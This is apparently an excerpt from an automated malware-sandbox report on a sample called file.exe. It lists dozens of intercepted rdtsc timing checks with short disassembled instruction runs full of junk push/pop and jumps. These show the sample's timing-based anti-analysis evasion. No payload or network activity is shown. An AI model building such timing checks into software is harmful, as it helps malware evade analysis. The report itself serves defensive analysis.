                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11801A8 second address: 11801B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118059B second address: 118059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866D2 second address: 11866D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866D6 second address: 11866E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866E2 second address: 11866E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866E8 second address: 11866EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866EE second address: 11866F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11866F5 second address: 1186701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1186701 second address: 1186722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1186722 second address: 1186742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F31ADDF79h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185FFF second address: 118600B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F6F31405BD6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11863EB second address: 118640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31ADDF71h 0x00000009 js 00007F6F31ADDF66h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118A874 second address: 118A878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F028 second address: 118F033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F31ADDF66h 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F033 second address: 118F03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F2C1 second address: 118F2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F2C7 second address: 118F2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnp 00007F6F31405BD6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F68C second address: 118F695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196EC0 second address: 1196EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F31405BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6F31405BE0h 0x00000012 jmp 00007F6F31405BE5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FFD1B second address: 10FFD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FFD21 second address: 10FFD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F6F31405BD6h 0x0000000c jnl 00007F6F31405BD6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FFD33 second address: 10FFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11952CB second address: 11952E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11952E2 second address: 11952F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F6F31ADDF6Eh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11952F9 second address: 11952FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11952FE second address: 1195304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11955FE second address: 119562E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6F31405BE8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F6F31405BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11958DC second address: 11958E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11958E7 second address: 11958EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11958EB second address: 11958FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1195C23 second address: 1195C4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F6F31405BD6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007F6F31405BE1h 0x00000019 jmp 00007F6F31405BDBh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1195ECF second address: 1195ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1195ED5 second address: 1195EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11961F3 second address: 11961FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11961FA second address: 1196213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6F31405BD6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 jc 00007F6F31405BD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196213 second address: 1196222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F6F31ADDF66h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196222 second address: 1196233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F6F31405BD6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11967E9 second address: 11967EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11967EE second address: 1196826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6F31405BE1h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F6F31405BD6h 0x00000018 jmp 00007F6F31405BE4h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196826 second address: 1196839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196839 second address: 1196858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31405BE9h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196B54 second address: 1196B63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F6F31ADDF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196B63 second address: 1196B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 jbe 00007F6F31405BD6h 0x0000000e pop edi 0x0000000f jmp 00007F6F31405BDDh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119A9EC second address: 119AA04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AA04 second address: 119AA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AA08 second address: 119AA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AA0E second address: 119AA2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6F31405BD6h 0x00000009 jmp 00007F6F31405BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ABC0 second address: 119ABE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F6F31ADDF74h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ABE2 second address: 119ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ABE6 second address: 119AC2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F31ADDF77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F6F31ADDF76h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jno 00007F6F31ADDF66h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AD69 second address: 119AD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AD6D second address: 119AD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF6Bh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AEB5 second address: 119AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jne 00007F6F31405BD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119AEC4 second address: 119AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF78h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B1A0 second address: 119B1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B1A8 second address: 119B1AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B1AD second address: 119B1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B330 second address: 119B334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B660 second address: 119B674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BDFh 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B674 second address: 119B679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119B679 second address: 119B681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0002 second address: 11A0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F6F31ADDF66h 0x0000000c jmp 00007F6F31ADDF79h 0x00000011 popad 0x00000012 jmp 00007F6F31ADDF76h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0042 second address: 11A0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A235B second address: 11A2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CCE second address: 11A9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CD7 second address: 11A9CE7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31ADDF66h 0x00000008 jg 00007F6F31ADDF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CE7 second address: 11A9CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7EBA second address: 11A7EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6F31ADDF6Dh 0x0000000b jno 00007F6F31ADDF66h 0x00000011 popad 0x00000012 jmp 00007F6F31ADDF71h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7EE5 second address: 11A7F04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F6F31405BE1h 0x0000000a pop ebx 0x0000000b jng 00007F6F31405BEAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A830E second address: 11A8313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A848C second address: 11A8490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A89B8 second address: 11A89BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CCB second address: 11A8CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CD1 second address: 11A8CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F31ADDF6Ch 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CE1 second address: 11A8CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CE9 second address: 11A8D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F6F31ADDF6Eh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8D10 second address: 11A8D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F6F31405BDBh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8D28 second address: 11A8D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9471 second address: 11A949B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push esi 0x0000000c jmp 00007F6F31405BE6h 0x00000011 jg 00007F6F31405BE2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9B74 second address: 11A9B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F6F31ADDF66h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9B83 second address: 11A9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5F2 second address: 11AE5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2C90 second address: 11B2D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE9h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007F6F31405BD6h 0x00000012 jnp 00007F6F31405BD6h 0x00000018 jmp 00007F6F31405BE4h 0x0000001d jmp 00007F6F31405BE4h 0x00000022 popad 0x00000023 jl 00007F6F31405BE2h 0x00000029 js 00007F6F31405BD6h 0x0000002f jg 00007F6F31405BD6h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6F31405BDBh 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2E6D second address: 11B2E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31ADDF74h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB20 second address: 11BEB31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB31 second address: 11BEB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6F31ADDF66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB3B second address: 11BEB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB5C second address: 11BEB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F31ADDF66h 0x00000010 jc 00007F6F31ADDF66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB72 second address: 11BEB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB78 second address: 11BEB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6F31ADDF6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE57C second address: 11BE581 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE6A4 second address: 11BE6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C42CA second address: 11C4302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6F31405BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jng 00007F6F31405BDCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007F6F31405BECh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C98 second address: 11C8C9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0D0A second address: 11D0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
